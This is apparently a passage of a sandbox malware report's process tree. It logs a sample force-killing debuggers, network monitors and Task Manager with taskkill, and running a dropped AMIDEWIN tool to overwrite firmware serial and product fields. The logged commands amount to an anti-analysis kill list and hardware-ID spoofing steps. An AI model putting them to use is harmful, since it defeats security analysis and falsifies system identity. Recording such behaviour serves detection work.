    - Suspicious use of AdjustPrivilegeToken
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:3404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:2476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:832
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:3936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Cerber
    PID:2644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:2596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3600
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:3980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:724
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2568
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:2448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:400
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4560
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4620
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1664
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Cerber
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4592
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    PID:3604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:5088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3480
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2696
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:2124
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Cerber
    PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2452
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:1160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1756
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Kills process with taskkill
    PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:5036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Kills process with taskkill
    PID:1288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:5100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:3988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Cerber
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:1672
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:3936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Cerber
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:2596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3780
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
  2⤵
  PID:3008
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
    3⤵
    - Executes dropped EXE
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:3804
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:760
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:4156
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Executes dropped EXE
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:3320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Kills process with taskkill
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
  2⤵
  PID:2660
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
    3⤵
    - Executes dropped EXE
    PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SS 8Q062OH5LH
  2⤵
  PID:1736
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SS 8Q062OH5LH
    3⤵
    - Executes dropped EXE
    PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3140
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
  2⤵
  PID:408
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:3196
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:2604
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
  2⤵
  PID:2824
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
    3⤵
    - Executes dropped EXE
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:3168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:3480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
  2⤵
  PID:1312
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
    3⤵
    - Executes dropped EXE
    PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BV " "
  2⤵
  PID:2808
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BV " "
    3⤵
    - Executes dropped EXE
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:4800
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BS 8Q062OH5LHWGI7
  2⤵
  PID:3200
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BS 8Q062OH5LHWGI7
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1376
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
  2⤵
  PID:3624
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
    3⤵
    - Executes dropped EXE
    PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
  2⤵
  PID:4952
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
    3⤵
    - Executes dropped EXE
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
  2⤵
  PID:1724
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
  2⤵
  PID:1304
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
    3⤵
    - Executes dropped EXE
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CS BB8DKRYT0P
  2⤵
  PID:2368
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CS BB8DKRYT0P
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
  2⤵
  PID:2036
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3444
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
  2⤵
  PID:2704
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:336
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Kills process with taskkill
    PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
  2⤵
  PID:2016
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:1128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3768
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
  2⤵
  PID:3780
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
  2⤵
  PID:3804
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4008
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Kills process with taskkill
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3508
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3280
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:400
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:1736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:1096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:616
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:408
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2628
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:3580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:3144
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:2824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Kills process with taskkill
    PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:1312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Kills process with taskkill
    PID:4000
